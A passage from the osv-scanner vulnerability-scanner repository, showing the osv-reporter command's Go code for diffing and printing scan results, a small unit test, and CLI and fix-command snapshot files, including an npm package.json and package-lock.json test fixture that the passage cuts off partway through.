func(_ context.Context, cmd *cli.Command) error { var termWidth int var err error if stdoutAsFile, ok := stdout.(*os.File); ok { termWidth, _, err = term.GetSize(int(stdoutAsFile.Fd())) if err != nil { // If output is not a terminal, termWidth = 0 } } oldPath := cmd.String("old") newPath := cmd.String("new") oldVulns := models.VulnerabilityResults{} if oldPath != "" { oldVulns, err = ci.LoadVulnResults(oldPath) if err != nil { cmdlogger.Warnf("failed to open old results at %s: %v - likely because target branch has no lockfiles.", oldPath, err) // Do not return, assume there is no oldVulns (which will display all new vulns). oldVulns = models.VulnerabilityResults{} } } newVulns, err := ci.LoadVulnResults(newPath) if err != nil { cmdlogger.Warnf("failed to open new results at %s: %v - likely because previous step failed.", newPath, err) newVulns = models.VulnerabilityResults{} // Do not return a non zero error code. } var diffVulns models.VulnerabilityResults diffVulnOccurrences := ci.DiffVulnerabilityResultsByOccurrences(oldVulns, newVulns) if len(diffVulnOccurrences) == 0 { // There are actually no new vulns, no need to do full diff // // Since `DiffVulnerabilityResultsByUniqueVulnCount` does not account for Source or Package, // this actually changes the results in some cases, e.g. // // When a lockfile is moved, `DiffVulnerabilityResults` will report the moved lockfile as having // a new vulnerability if the existing lockfile has a vulnerability. However this check will // report no vulnerabilities. This is desired behavior. // TODO: This will need to be not empty when we change osv-scanner to report all packages diffVulns = models.VulnerabilityResults{} } else { // TODO: This will need to contain all scanned packages when we change osv-scanner to report all packages diffVulns = ci.DiffVulnerabilityResults(oldVulns, newVulns) } showAllVulns := cmd.Bool("all-vulns") stdoutTaken := false outputPaths := cmd.StringSlice("output-files") if len(outputPaths) == 0 { outputPaths = cmd.StringSlice("output") } if len(outputPaths) != 0 { for _, outputPath := range outputPaths { format := "sarif" // Parses strings like: "markdown:./output-path.md preColon, postColon, found := strings.Cut(outputPath, ":") if found { outputPath = postColon format = preColon } var writer io.Writer var err error switch outputPath { case "#stdout": writer = stdout stdoutTaken = true case "#stderr": writer = stderr stdoutTaken = true default: writer, err = os.Create(outputPath) } if err != nil { return fmt.Errorf("failed to create output file: %w", err) } termWidth = 0 if errPrint := reporter.PrintResult(&diffVulns, format, writer, termWidth, showAllVulns); errPrint != nil { return fmt.Errorf("failed to write output: %w", errPrint) } } } if !stdoutTaken { if errPrint := reporter.PrintResult(&diffVulns, "table", stdout, termWidth, showAllVulns); errPrint != nil { return fmt.Errorf("failed to write output: %w", errPrint) } } if cmd.Bool("gh-annotations") { if errPrint := reporter.PrintResult(&diffVulns, "gh-annotations", stderr, termWidth, showAllVulns); errPrint != nil { return fmt.Errorf("failed to write output: %w", errPrint) } } // Default to true, only false when explicitly set to false failOnVuln := !cmd.IsSet("fail-on-vuln") || cmd.Bool("fail-on-vuln") // Check if any is *not* called anyIsCalled := false for _, vuln := range diffVulns.Flatten() { if vuln.GroupInfo.IsCalled() { anyIsCalled = true break } } // if vulnerability exists it should return error if len(diffVulns.Results) > 0 && failOnVuln && anyIsCalled { return osvscanner.ErrVulnerabilitiesFound } return nil }, } err := app.Run(context.Background(), args) // if the config is invalid, it's possible that is why any other errors // happened so that exit code takes priority if logger.HasErroredBecauseInvalidConfig() { return 130 } if err != nil { if errors.Is(err, osvscanner.ErrVulnerabilitiesFound) { return 1 } if errors.Is(err, osvscanner.ErrNoPackagesFound) { cmdlogger.Errorf("No package sources found, --help for usage information.") return 128 } cmdlogger.Errorf("%v", err) } // if we've been told to print an error, and not already exited with // a specific error code, then exit with a generic non-zero code if logger.HasErrored() { return 127 } return 0 } func main() { os.Exit(run(os.Args, os.Stdout, os.Stderr)) } ================================================ FILE: cmd/osv-reporter/main_test.go ================================================ package main import ( "reflect" "testing" ) func Test_splitLastArg(t *testing.T) { t.Parallel() tests := []struct { name string args []string want []string }{ { args: []string{ "--test1", "--test2", "--test3\n--test4\n--test5", }, want: []string{ "--test1", "--test2", "--test3", "--test4", "--test5", }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := splitLastArg(tt.args); !reflect.DeepEqual(got, tt.want) { t.Errorf("splitLastArg() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: cmd/osv-scanner/__snapshots__/main_test.snap ================================================ [Test_run/#00 - 1] NAME: osv-scanner scan - scans projects and container images for dependencies, and checks them against the OSV database. USAGE: osv-scanner scan [command [command options]] DESCRIPTION: scans projects and container images for dependencies, and checks them against the OSV database. COMMANDS: source scans a source project's dependencies for known vulnerabilities using the OSV database. image detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally OPTIONS: --help, -h show help --- [Test_run/#00 - 2] --- [Test_run/#01 - 1] NAME: osv-scanner scan - scans projects and container images for dependencies, and checks them against the OSV database. USAGE: osv-scanner scan [command [command options]] DESCRIPTION: scans projects and container images for dependencies, and checks them against the OSV database. COMMANDS: source scans a source project's dependencies for known vulnerabilities using the OSV database. image detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally OPTIONS: --help, -h show help --- [Test_run/#01 - 2] --- [Test_run/version - 1] osv-scanner version: 2.3.4 osv-scalibr version: 0.4.5 commit: n/a built at: n/a --- [Test_run/version - 2] --- [Test_run_SubCommands/scan_with_a_flag - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [Test_run_SubCommands/scan_with_a_flag - 2] Warning: `scan` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. `scan` is assumed to be a subcommand here. If you intended for `scan` to be an argument to `scan`, you must specify `scan scan` in your command line. --- [Test_run_SubCommands/with_no_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [Test_run_SubCommands/with_no_subcommand - 2] --- [Test_run_SubCommands/with_scan_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [Test_run_SubCommands/with_scan_subcommand - 2] Warning: `scan` exists as both a subcommand of OSV-Scanner and as a file on the filesystem. `scan` is assumed to be a subcommand here. If you intended for `scan` to be an argument to `scan`, you must specify `scan scan` in your command line. --- ================================================ FILE: cmd/osv-scanner/fix/__snapshots__/command_test.snap ================================================ [TestCommand/errors_when_in_place_used_without_lockfile - 1] --- [TestCommand/errors_when_in_place_used_without_lockfile - 2] in-place strategy requires lockfile --- [TestCommand/errors_when_in_place_used_without_lockfile - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "6.2.0" } } --- [TestCommand/errors_when_override_used_without_manifest - 1] --- [TestCommand/errors_when_override_used_without_manifest - 2] override strategy requires manifest file --- [TestCommand/errors_when_override_used_without_manifest - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, "node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "dependencies": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.5.0", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" }, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "dependencies": { "assert-plus": "^1.0.0" } }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" }, "engines": { "node": "*" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "dependencies": { "natives": "^1.1.3" }, "engines": { "node": ">=0.4.0" } }, "node_modules/har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", "engines": { "node": ">=4" } }, "node_modules/har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "deprecated": "this library is no longer supported", "dependencies": { "ajv": "^6.12.3", "har-schema": "^2.0.0" }, "engines": { "node": ">=6" } }, "node_modules/has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "node_modules/hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "dependencies": { "function-bind": "^1.1.2" }, "engines": { "node": ">= 0.4" } }, "node_modules/hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "node_modules/http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "dependencies": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" }, "engines": { "node": ">=0.8", "npm": ">=1.3.7" } }, "node_modules/inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "dependencies": { "once": "^1.3.0", "wrappy": "1" } }, "node_modules/inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "node_modules/is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "dependencies": { "hasown": "^2.0.0" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "node_modules/isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "node_modules/isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "node_modules/jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "node_modules/json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "node_modules/json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "node_modules/jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" }, "engines": { "node": ">=0.6.0" } }, "node_modules/mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", "engines": { "node": ">= 0.6" } }, "node_modules/mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" }, "engines": { "node": ">= 0.6" } }, "node_modules/minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "dependencies": { "brace-expansion": "^1.1.7" }, "engines": { "node": "*" } }, "node_modules/minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" }, "bin": { "mkdirp": "bin/cmd.js" } }, "node_modules/natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==", "deprecated": "This module relies on Node.js's internals and will break at some point. Do not use it, and update to graceful-fs@4.x." }, "node_modules/normalize-package-data": { "version": "2.5.0", "resolved": 